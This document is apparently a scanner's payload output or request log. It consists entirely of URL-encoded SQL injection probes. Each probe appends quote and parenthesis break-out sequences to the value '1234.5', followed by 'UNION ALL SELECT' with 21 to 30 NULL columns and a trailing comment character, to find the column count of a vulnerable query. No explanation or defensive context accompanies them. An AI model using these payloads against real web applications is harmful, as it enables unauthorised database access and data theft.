1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 